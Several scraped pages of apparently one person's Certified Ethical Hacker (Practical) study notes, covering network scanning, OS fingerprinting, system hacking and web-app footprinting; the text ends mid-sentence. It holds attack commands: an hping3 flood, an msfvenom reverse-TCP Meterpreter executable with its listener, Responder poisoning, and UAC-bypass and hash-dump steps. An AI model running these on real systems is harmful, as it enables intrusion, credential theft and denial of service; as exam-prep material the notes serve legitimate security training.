![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252F7nvGwJJ30F4YmAOqS3SS%252Fipscan-win10.png%3Falt%3Dmedia%26token%3D99f46271-b48b-4784-a8b4-57db352acd86&width=768&dpr=3&quality=100&sign=4d4b8a97&sv=2) [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fangryip.org%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=9211e9a1&sv=2)Angry IP Scanner - the original IP scanner for Windows, Mac and Linuxangryip.org](https://angryip.org/) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#megaping) MegaPing -------------------------------------------------------------------------------------------------------------------------- * MegaPing is the ultimate must-have toolkit that provides all essential utilities for Information System specialists, system administrators, IT solution providers or individuals. * Mega Ping is also a port and service scanning tool which is for Windows. ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252F4uwZL52HIvetHIy3Q2wX%252FMegaPing.png%3Falt%3Dmedia%26token%3D5103ac30-bc09-448b-8cb0-a59e0f19a559&width=768&dpr=3&quality=100&sign=21ad69f3&sv=2) [https://www.softpedia.com/get/Network-Tools/Network-Monitoring/MegaPing.shtml](https://www.softpedia.com/get/Network-Tools/Network-Monitoring/MegaPing.shtml) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#hping3) Hping3 ---------------------------------------------------------------------------------------------------------------------- * hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. * It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols, do path MTU discovery, perform traceroute-like actions under different protocols, fingerprint remote operating systems, audit TCP/IP stacks, etc. hping3 is scriptable using the Tcl language. * Hping3 is a python based tool used to scan and flood(DOS) the particular IP. Copy hping3 10.10.10.x --udp --random-source --data 500 hping3 -S 10.10.10.x -p 80 -c 5 (5 TCP packets sent) hping3 10.10.10.x --flood (PING OF DEATH! Flooding the IP with TCP Packets) Later in the upcoming modules you may read have chance to use [**Hping3**](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#hping3) . But for time being as per my suggestion, use [**ZenMap GUI**](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#zenmap) to scan the IP range to get the information or if you are comfortable with CLI go for [**nmap**.](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#nmap) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#operating-system-discovery) Operating System Discovery -------------------------------------------------------------------------------------------------------------------------------------------------------------- * The Operating System(OS) discovery has **two types** they are: * Active Banner Grabbing * Passive Banner Grabbing * By Banner Grabbing the TTL and TCP Window Size of respective IP, we can identify the Operating System that server runs on. Here are the list of Operating System. Operating System (OS) Time To Live TCP Window Size Linux (Kernel 2.4 and 2.6) 64 5840 Google Linux 64 5720 FreeBSD 64 65535 OpenBSD 64 16384 Windows 95 32 8192 Windows 2000 128 16384 Windows XP 128 65535 Windows 98, Vista and 7 (Server 2008) 128 8192 iOS 12.4 (Cisco Routers) 255 4128 Solaris 7 255 8760 AIX 4.3 64 16384 ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252F5ea2xPKdfC0yIn8CthgH%252Fimage.png%3Falt%3Dmedia%26token%3D5540d543-1bed-4b06-a0fb-babf75177f0a&width=768&dpr=3&quality=100&sign=331c04f8&sv=2) TTL of this IP is 128 so it might be Windows 98, Vista and 7 (Server 2008) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#nmap-script) Nmap Script Copy nmap --script smb-os-discovery.nse 10.10.10.x [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#metasploit) Metasploit ------------------------------------------------------------------------------------------------------------------------------ > We can also scan our target using metasploit #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#init-the-metasploit-framework-and-check-the-status-of-database) Init the Metasploit Framework and check the status of database Copy msfdb init service postgresql start msfconsole db status #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#scanning-using-nmap-inside-metasploit) Scanning using Nmap inside Metasploit Copy nmap -Pn -sS -A -oX Test 10.10.10/24 db import Test hosts (Here you will now listed with the Details of the subnets) services or db_services As per my whish i avoided the Nmap scan using Metasploit because it might looks process tedious **as for me** where using [**ZenMap GUI**](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#zenmap) or even through [**Nmap CLI**](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#nmap) are even much easier you can get the available machine's IP from the IP subnet through [**hostdiscover**](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks#host-discovery) command. [PreviousReconnaissance (Footprinting)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting) [NextEnumeration](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration) Last updated 4 years ago --- # System Hacking | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#introduction) Introduction ------------------------------------------------------------------------------------------------------------------------------- System hacking is defined as the **compromise between computer systems and software to access the target computer and steal or misuse its sensitive information**. The malware and the attacker identify and exploit the vulnerability of the computer system to gain unauthorized access. #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#steps-involved-in-system-hacking) Steps involved in System Hacking 1. Gaining Access 2. Escalation Privileges 3. Maintaining Access 4. Clearing Logs [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#ntlm) NTLM --------------------------------------------------------------------------------------------------------------- Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users' identities and protect the integrity and confidentiality of their activity. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=3&quality=100&sign=4c6031fc&sv=2)LM, NTLM, Net-NTLMv2, oh my!Medium](https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4) This Medium Post might give you an idea about NTLM Hashes ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#responder) Responder Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer _specific_ NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409) ). By default, the tool will only respond to File Server Service requests, which are for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behaviour. You can set the -r option via the command line if you want to answer the Workstation Service request for a name suffix. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub](https://github.com/SpiderLabs/Responder) [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=3&quality=100&sign=4c6031fc&sv=2)Gaining Credentials Easily with Responder ToolMedium](https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b) This migh be useful! Give a read Copy chmod +x Responder.py sudo ./Responder.py -I eth0 Responder.py -I eth0 -dwrv ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#cracking-ntlm-hash-using-john-the-ripper) Cracking NTLM Hash using John-The-Ripper John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems. It has a bunch of passwords in both raw and hashed format. Now to crack the password, John the Ripper **will identify all potential passwords in** a hashed format. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - openwall/john: John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAsGitHub](https://github.com/openwall/john) 471KB [jtr-cheat-sheet.pdf](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FzUprL1hKlwrfKmlCxsME%2Fjtr-cheat-sheet.pdf?alt=media&token=118c1e86-1020-48ca-afd6-6e265cb17273) PDF Download[Open](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FzUprL1hKlwrfKmlCxsME%2Fjtr-cheat-sheet.pdf?alt=media&token=118c1e86-1020-48ca-afd6-6e265cb17273) [https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf](https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf) [John The Ripper Hash Formatspentestmonkey](https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#backdoor-using-metasploit) Backdoor Using Metasploit --------------------------------------------------------------------------------------------------------------------------------------------------------- The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7. #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#crafting-windows-executable-through-msfvenom) Crafting Windows executable through MSFVenom Copy msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#setting-up-reverse-listener-using-msfconsole) Setting up reverse listener using msfconsole Copy msfconsole -q use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST YOUR-IP-ADDRESS ser RPORT ANY-FREE-PORT exploit [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#powersploit) PowerSploit ----------------------------------------------------------------------------------------------------------------------------- PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation FrameworkGitHub](https://github.com/PowerShellMafia/PowerSploit) #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#must-read-this-tutorial) Must Read this tutorial [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fassets.content.technologyadvice.com%2Fwonderhowto_favicon_920b4b43ef.webp&width=20&dpr=3&quality=100&sign=8876603c&sv=2)Hack Like a Pro: How to Use PowerSploit, Part 1 (Evading Antivirus Software)Null Byte](https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#armitage) Armitage ----------------------------------------------------------------------------------------------------------------------- _Armitage_ is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252Fsymgb6cvomFj9c3RD1L4%252FArmitage_5_shells.png%3Falt%3Dmedia%26token%3D09e653ec-f10d-41da-9499-a3858812b007&width=768&dpr=3&quality=100&sign=d225c0dc&sv=2) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#hacking-microsoft-office-with-macro) Hacking Microsoft office with Macro ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.yeahhub.com%2Fwp-content%2Fuploads%2F2019%2F01%2Ffavicon.png&width=20&dpr=3&quality=100&sign=672ea2e1&sv=2)Exploit Windows with Malicious MS-OFFICE File \[Metasploit Framework\] - Yeah HubYeah Hub](https://www.yeahhub.com/exploit-windows-malicious-ms-office-file-metasploit-framework) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#privesc-windows-machine-using-beroot) Privesc Windows Machine using BeRoot ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- BeRoot Project is a post-exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the [pupy](https://github.com/n1nj4sec/pupy/) project as a post-exploitation module (so it will be executed in memory without touching the disk). This tool does not realize any exploitation. Its main goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only information that has been found as a potential way to escalate our privilege. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / MacGitHub](https://github.com/AlessandroZ/BeRoot) #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#steps-you-can-replicate) Steps you can replicate 1. Upload the BeRoot.exe into the Machine through Reverse Shell 2. Interact to the win shell. 3. BeRoot.exe 4. Run post/windows/gather/smart\_hashdump 5. to get System prev to try to use "getsystem -t 1" If it responds negative then follow the next step 6. Let's try another exploit. "use exploit/windows/local/bypassuac\_fodhelper" and set the session into that exploit. 7. After exploit try to run "getuid" "getsystem -t 1" "getuid" 8. Run post/windows/gather/smart\_hashdump #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking#other-methodology) Other Methodology: [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=3&quality=100&sign=4c6031fc&sv=2)Bypassing Windows 10 UAC with PythonMedium](https://medium.com/@tommelo/bypassing-windows-10-uac-with-python-aed3c835c4f0) [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.hackingarticles.in%2Fwp-content%2Fuploads%2F2026%2F03%2Fcropped-HA-Logo-192x192.jpg&width=20&dpr=3&quality=100&sign=be92e971&sv=2)Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)Hacking Articles](https://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key) [PreviousVulnerability Analysis](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis) [NextSteganography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography) Last updated 4 years ago --- # The Final Note | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note.md) . ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note#hey-thank-you-for-reading-my-notes.-i-hope-this-will-be-your-only-source-of-side-support-throughout) Hey! Thank you for reading my notes. I hope this will be your only source of side support throughout your CEH (Practical) preparation. I strongly suggest you take your own notes so that you can personalize them. Disclaimer: These notes are only for your personal preparation. I did it for mine, and I thought it might help others too. You can share this note anywhere, but if any issue arises, I'm not responsible for it. Also, some of the tools I've mentioned in the notes are not updated, handle them with your own response. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note#support-me) Support Me --------------------------------------------------------------------------------------------------------------------------- #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note#hi-again-so-i-put-much-effort-into-writing-certified-ethical-hacker-practical-notes-since-they-are-n) Hi Again! So I put much effort into writing Certified Ethical Hacker (Practical) Notes since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁😍💝 [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fcdn.buymeacoffee.com%2Fstatic%2Fprod%2F12.3.2%2Fbuild%2Fassets%2Fapple-icon-180x180-912350ec.png&width=20&dpr=3&quality=100&sign=6c0fd007&sv=2)Guru HariHaraunBuy Me a Coffee](https://www.buymeacoffee.com/guruhariharaun) Buy me a coffee here 😍😁 [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note#i-need-your-feedback) I Need your Feedback ----------------------------------------------------------------------------------------------------------------------------------------------- #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note#at-the-bottom-of-the-pages-you-can-find-emojis.-please-do-rate-it-based-on-your-preferences.-it-migh) At the bottom of the pages, you can find emojis. Please do rate it based on your preferences. It might help me to stay motivated as well. 😊 [PreviousCryptography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography) Last updated 4 years ago --- # Unknown \# Book of Guru HariHaraun ## Book of Guru HariHaraun - \[About the Author\](https://book.thegurusec.com/about-the-author.md): Welcome to the Book of Guru HariHaraun. Here, I share and document all my write-ups, which might help others in the information security community. - \[Certified Ethical Hacker (C|EH)(Practical)\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical.md): This note will guide you with all my methodologies I used while preparing and throughout the exam. - \[Reconnaissance (Footprinting)\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting.md): Welcome to the Footprinting module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[Scanning Networks\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks.md): Welcome to the Scanning Networks module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[Enumeration\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration.md): Welcome to the Enumeration module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[Vulnerability Analysis\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis.md): Welcome to the Vulnerability Analysis module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[System Hacking\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking.md): Welcome to the System Hacking module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[Steganography\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography.md): Welcome to the Steganography module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[Sniffing\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing.md): Welcome to the Sniffing module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[SQL Injection\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection.md): Welcome to the SQL Injection module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[Hacking Web Applications & Servers\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers.md): Welcome to the Hacking Web Applications & Servers module. This note will guide you thru all the methodologies I followed while preparing for CEH (Practical) exam. - \[Cloud Computing\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing.md): Welcome to the Cloud Computing module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[Cryptography\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography.md): Welcome to the Cryptography module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam. - \[The Final Note\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note.md): Finally, for the Final Note. This note would have been guided you thru all the methodologies that I used while preparing for the CEH (Practical) exam. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical.md). # Certified Ethical Hacker (C|EH)(Practical) !\[Logo of Certified Ethical Hacker (Practical) | C|EH (Practical)\](/files/k38j7WnyvUcUhTm6ekQl) ## Introduction \*\*Hey there!👋🏻\*\* Welcome to my notes If you are here then you are probably to pass your \*\*Certified Ethical Hacker (Practical)\*\* exam or to get to know about the exam. So this book guides you with all the tools, tricks procedures, notes. I used it in my preparation and during my exam. {% hint style="danger" %} \*\*Disclaimer:\*\* You can't 100% relay this note for your exam preparation. Since I do have experience with penetration testing I might have skipped a few steps. I tried almost to add all the tools and steps in layman terms, so please get used to it and always google the stuff. Use these notes as your escape mechanism before your exam. All the tools which have mentioned in this guide may not be safe to use since some of the tools are not been maintained by the team. If any issues happen for you or for your computer, I'm not responsible. {% endhint %} ## My Write-up You can read my blog on \[\*\*how I cracked CEH (Practical) with a full score on my first attempt\*\*\*\*.\*\*\](https://thegurusec.medium.com/how-i-passed-ceh-practical-in-my-first-attempt-647926a3a0ac) Since I wrote a blog on Medium, I'm not duplicating all my content here on this page, also, it may affect the SEO rank of my website. {% embed url="" %} ## Page of Content {% content-ref url="/pages/UtBEq1n7vnt3zZuzqJTF" %} \[Reconnaissance (Footprinting)\](/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting.md) {% endcontent-ref %} {% content-ref url="/pages/vzu3AZXplE54wEtWt7WE" %} \[Scanning Networks\](/certifications/certified-ethical-hacker-practical/scanning-networks.md) {% endcontent-ref %} {% content-ref url="/pages/Trye82lw5rPirDIr4F6w" %} \[Enumeration\](/certifications/certified-ethical-hacker-practical/enumeration.md) {% endcontent-ref %} {% content-ref url="/pages/GWNyscxbamVDh57A0MsI" %} \[Vulnerability Analysis\](/certifications/certified-ethical-hacker-practical/vulnerability-analysis.md) {% endcontent-ref %} {% content-ref url="/pages/w2K2fW6l6CtKi78VUrtr" %} \[System Hacking\](/certifications/certified-ethical-hacker-practical/system-hacking.md) {% endcontent-ref %} {% content-ref url="/pages/g3cxEWffxNXSgACG9Tio" %} \[Steganography\](/certifications/certified-ethical-hacker-practical/steganography.md) {% endcontent-ref %} {% content-ref url="/pages/2Wr8ClwFx7z1jvKJIyDM" %} \[Sniffing\](/certifications/certified-ethical-hacker-practical/sniffing.md) {% endcontent-ref %} {% content-ref url="/pages/0BGGSvXNyODqf1zjgTiK" %} \[SQL Injection\](/certifications/certified-ethical-hacker-practical/sql-injection.md) {% endcontent-ref %} {% content-ref url="/pages/qpWevTTIyKbteP1LS7nr" %} \[Hacking Web Applications & Servers\](/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers.md) {% endcontent-ref %} {% content-ref url="/pages/9ezQQLviXhj6U4vowhjv" %} \[Cloud Computing\](/certifications/certified-ethical-hacker-practical/cloud-computing.md) {% endcontent-ref %} {% content-ref url="/pages/Asdy5MxyLP29K7NHpzbg" %} \[Cryptography\](/certifications/certified-ethical-hacker-practical/cryptography.md) {% endcontent-ref %} {% content-ref url="/pages/iOaewN2KFunIswjU9Nd4" %} \[The Final Note\](/certifications/certified-ethical-hacker-practical/the-final-note.md) {% endcontent-ref %} ## Showcase ### Certificate: !\[Certificate of Achievement - Certified Ethical Hacker (Practical)\](/files/Nn9nAOyvTdnQJnkZkrFF) ### Digital Badge You can verify my Digital Badge for authenticity here on the ASPEN portal. {% embed url="" %} Digital Badge of Guru HariHaraun {% endembed %} ## Support Me #### Hi Again! So I put much effort into writing Certified Ethical Hacker (Practical) Notes since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁😍💝 {% embed url="" %} Support me here by buying me a coffee 😁🥰 {% endembed %} --- # Cloud Computing | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing#introduction) Introduction -------------------------------------------------------------------------------------------------------------------------------- Cloud computing is the on-demand availability of computer system resources, especially data storage and computing power, without direct active management by the user. Large clouds often have functions distributed over multiple locations, each location being a data centre. ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing#tools-for-enumeration) Tools for Enumeration 1. Lazys3 2. S3Scanner [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing#amazon-web-services) Amazon Web services ---------------------------------------------------------------------------------------------------------------------------------------------- [https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3book.hacktricks.xyz](https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3) This Book has all details about AWS Vuln [PreviousHacking Web Applications & Servers](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers) [NextCryptography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography) Last updated 4 years ago This site uses cookies to deliver its service and to analyze traffic. By browsing this site, you accept the [privacy policy](https://policies.gitbook.com/privacy/cookies) . AcceptReject --- # Hacking Web Applications & Servers | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#identify-technology-footprint) Identify Technology (Footprint) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * Identifying the technology that is used by the web application would give us an idea on how to exploit that particular application. #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#list-of-tools-used-to-identify-the-technology) List of tools used to identify the technology 1. httprecon 2. [wappalyzer](https://www.wappalyzer.com/) 3. whatweb (CLI) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#other-methods) Other Methods * Using Telnet * Using NetCat ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#nmap-scripts) Nmap Scripts #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#normal-http-enumeration) Normal HTTP Enumeration Copy nmap -sV --script=http-enum www.xyz.com #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#waf-detection) WAF Detection Copy nmap -p 80,443 --script=http-waf-detect www.xyz.com [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#directory-bruteforce) Directory Bruteforce --------------------------------------------------------------------------------------------------------------------------------------------------------------------- Brute force directory guessing attacks are very common attacks used against websites and web servers. They are **used to finding hidden and often forgotten directories on a site to try to compromise**. Check out [Alexis Ahmed's](https://ke.linkedin.com/in/alexisahmed) video on Fuzzing and Directory Brute-Force. This can gives you an idea. ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#dirbuster-for-directory-brute-force) Dirbuster for Directory Brute force DirBuster is a multi-threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However, tools of this nature are often only good as the directory and file list they come with. A different approach was taken to generate this. The list was generated from scratch, by crawling the Internet and enough, the directory and files that are actually used by developers! DirBuster comes with a total of 9 different lists, this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.kali.org%2Fimages%2Ffavicon.png&width=20&dpr=3&quality=100&sign=cb792676&sv=2)dirbuster | Kali Linux ToolsKali Linux](https://www.kali.org/tools/dirbuster) #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#cheatsheets-for-dirbuster) CheatSheets for Dirbuster [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fassets.content.technologyadvice.com%2Fwonderhowto_favicon_920b4b43ef.webp&width=20&dpr=3&quality=100&sign=8876603c&sv=2)Hack Like a Pro: How to Find Directories in Websites Using DirBusterNull Byte](https://null-byte.wonderhowto.com/how-to/hack-like-pro-find-directories-websites-using-dirbuster-0157593) You can use any directory brute force tools eg: GoBuster, Dirsearch, BruteX, etc... But make your mind that every tool makes the same process. So, master one tool and you are good to go. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#service-bruteforce) Service Bruteforce ----------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers#hydra) Hydra Man! I 